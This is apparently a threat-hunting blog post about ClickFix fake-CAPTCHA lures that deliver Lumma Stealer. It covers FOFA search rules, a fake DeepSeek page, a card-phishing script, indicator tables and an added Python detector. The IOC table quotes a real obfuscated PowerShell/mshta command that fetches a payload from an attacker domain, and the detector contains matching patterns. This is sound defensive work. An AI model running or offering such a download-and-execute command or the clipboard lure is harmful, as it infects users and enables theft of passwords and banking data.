Hunting clickfix threat (using FOFA)
I recently came across Lumma, so I decided to do some CTI research on this stealer to understand how part of its infrastructure works. It is, of course, just a piece of malware available to multiple attacker groups, and today's analysis is based on a specific timeframe (late April 2025) and its contextual elements. Enjoy the read.
For those who are unfamiliar, ClickFix is a fake CAPTCHA campaign that prompts users to "verify they are not a robot." Once the test is completed, a PowerShell script is silently executed, downloading a stealer like Lumma. This technique allows for the exfiltration of passwords, cookies, and other sensitive data. The campaign spreads via compromised websites or SEO poisoning.
I'm starting from the fake CAPTCHA lure example described in this article from The Regents of the University of California, where users are tricked into executing malicious commands. This scenario serves as a basis for creating CTI hunting rules to identify similar threats that rely on social engineering and manual command execution.
From this lure, I established several functional hunting rules on the Chinese search engine FOFA:
Rule 1: "In the verification window, press Ctrl""Press Enter on your keyboard to finish." URL: https://fofa.info/result?qbase64=IkluIHRoZSB2ZXJpZmljYXRpb24gd2luZG93LCBwcmVzcyBDdHJsIiAiUHJlc3MgRW50ZXIgb24geW91ciBrZXlib2FyZCB0byBmaW5pc2guIg%3D%3D
Result 1:

Comment: hunting rule built from the verification-step keywords.
Rule 2: "In the verification window, press Ctrl + V."
Result 2

Pivot on the hash of the DeepSeek icon used by the malicious pages, combined with geolocation in Russia:

An interesting result: "cleepseek", where the c and the l are placed so close together that they read as a d. Clever ;)

Looking at an ongoing Lumma campaign, we see that two lures are in use: one aimed at Windows users via a fake Windows update, and one built around a fake DeepSeek site.

Let's analyze:
I visited one of the suspicious URLs found using our hunting rule:
hxxps://deepseekdata[.]online/sign-in[.]html
When I enter fake credentials, I'm asked whether I'm a robot.

When I click the hitbox to proceed to the CAPTCHA step, a payload is actually copied to my clipboard. Here it is:

Meanwhile, the malicious page moves on to the next step and waits for me to follow these instructions:

This is incredibly clever: the unwary user only sees the end of the payload, whereas if you scroll back to the beginning...


The payload is complete. (I obviously defanged the URL for illustration purposes.) In the same campaign, I found a fake SSL certificate renewal page:

Here, clicking the fake hitboxes doesn't copy any malicious payload, just the instructions. This could be a developer error, the remains of a past campaign, or even a campaign still being prepared.

Since the URL of this campaign is already known and flagged everywhere, and attributed to Lumma Stealer, the threat actor (or a security operator) must have taken the URL down; it is no longer exploitable. So I'll continue my research to learn more about ClickFix.
So, it's Lumma we're going to hunt here. Let's continue.
I'll return to my malicious Lumma page here: hxxps://deepseekdata[.]online/sign-in[.]html

And I'll try a pivot on the reCAPTCHA image:

Next, I'll try a pivot on the intercom exports found in the source code of the web page, in this case the sentry_dsn:
On FOFA:

hxxps://f305de69cac64a84a494556d5303dc2d@app[.]getsentry[.]com/24287

Pivot!

This story smells pretty good: our ASN (13335) is back, along with a server extension including buckets3 💨. I go to the first URL:

IOC: hxxps[://]da3v492gwmewgyege8[.]roads-uae[.]org
Visiting the URL, I see that it hosts a malicious script:

The script loads resources from dubious servers, such as roads-uae[.]org and sephona[.]digital, and injects an invisible iframe into the page to stealthily manipulate the user. When the user clicks certain buttons (e.g., "Continue to Payment"), they are redirected to a fraudulent payment page that could be used to steal their banking information. The script also hides certain interface elements, such as social login options, to avoid raising suspicion. It integrates Microsoft Clarity to track user actions in order to collect sensitive data. Here is the phishing page that steals victims' banking information:

Once the victim has entered the information, they are redirected to a fake verification page that spins endlessly:

IOCs:

Type | Value | Additional Info
Command | powershell -w 1 powershell -Command ('ms]]]ht]]]a]]][.]]]]exe <https://overcoatpassably>[.]shop/Z8UZbPyVpGfdRS/maloy[.]mp4' -replace ']' ) | PowerShell command to download a file (.mp4), obfuscated
Comment | # ✅ 'I am not a robot - reCAPTCHA Verification ID: 5669' | Disguised as reCAPTCHA-related activity

Domain / Host | IP Address | Associated URL | ASN | Organization | Location
a[.]deepseekdata[.]online | 104.21.47[.]6 | hxxps://a[.]deepseekdata[.]online | 13335 | CLOUDFLARENET | USA / California / San Francisco
deepseekdata[.]online | 104.21.47[.]6 | — | 13335 | CLOUDFLARENET | USA / California / San Francisco
ns2[.]windows-update[.]site | 172.67.132[.]82 | hxxps://windows-update[.]site | 13335 | CLOUDFLARENET | USA / California / San Francisco
(Not specified) | 172.67.169[.]170 | hxxps://a[.]deepseekdata[.]online | 13335 | CLOUDFLARENET | USA / California / San Francisco
The FOFA searches used:
"In the verification window, press Ctrl""Press Enter on your keyboard to finish."
"In the verification window, press Ctrl + V."
"ms]]]ht]]]a]]].]]]exe"
Comment: hunting rule built from the malicious command line, using FOFA.
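As an added defensive example (not code from the original post), here is a small Python routine that undoes the `-replace ']'` trick seen in the IoC command above and flags the resulting mshta launch and fake-CAPTCHA comment in process command lines. The sample command lines and the domain `lure.example.invalid` are constructed placeholders.

```python
import re

# Constructed sample process-creation command lines (not real telemetry).
# The first mimics the obfuscated ClickFix/Lumma launcher from the IoC table:
# PowerShell's -replace ']' strips every ']' at runtime, turning
# 'ms]]]ht]]]a]]].]]]exe' back into 'mshta.exe'. Domain is a placeholder.
SAMPLE_COMMAND_LINES = [
    "powershell -w 1 powershell -Command ('ms]]]ht]]]a]]].]]]exe "
    "https://lure.example.invalid/Z8/video.mp4' -replace ']' ) "
    "# ✅ 'I am not a robot - reCAPTCHA Verification ID: 5669'",
    "powershell -Command Get-ChildItem C:\\Users",
    "mshta.exe https://lure.example.invalid/update.mp4",
]

# The `'...' -replace ']'` construct: capture the quoted, bracket-padded payload.
REPLACE_TRICK = re.compile(r"'([^']*)'\s*-replace\s*'\]'", re.IGNORECASE)
# Indicators evaluated on the *normalized* command line.
MSHTA_REMOTE = re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.IGNORECASE)
FAKE_CAPTCHA = re.compile(r"I am not a robot|reCAPTCHA Verification", re.IGNORECASE)
MEDIA_EXT = re.compile(r"https?://\S+\.(?:mp4|mp3|png|jpg)\b", re.IGNORECASE)


def normalize(cmdline: str) -> str:
    """Emulate the observed de-obfuscation: remove ']' from every quoted
    string that is piped through -replace ']', leaving the rest intact."""
    def strip_brackets(m: re.Match) -> str:
        return "'" + m.group(1).replace("]", "") + "'"
    return REPLACE_TRICK.sub(strip_brackets, cmdline)


def classify(cmdline: str) -> dict:
    """Return which indicators fired; 'suspicious' is True when mshta is
    launched against a remote URL or the fake-CAPTCHA comment is present."""
    norm = normalize(cmdline)
    hits = {
        "obfuscated_replace": bool(REPLACE_TRICK.search(cmdline)),
        "mshta_remote": bool(MSHTA_REMOTE.search(norm)),
        "fake_captcha_comment": bool(FAKE_CAPTCHA.search(norm)),
        "media_extension_lure": bool(MEDIA_EXT.search(norm)),
        "normalized": norm,
    }
    hits["suspicious"] = hits["mshta_remote"] or hits["fake_captcha_comment"]
    return hits


def scan(lines) -> list:
    """Classify a batch of command lines (e.g. Sysmon EventID 1 exports)."""
    return [classify(line) for line in lines]
```

Matching on the normalized form catches variants that pad `mshta` with a different number of brackets, which a literal FOFA-style string match on `ms]]]ht]]]a]]].]]]exe` would miss.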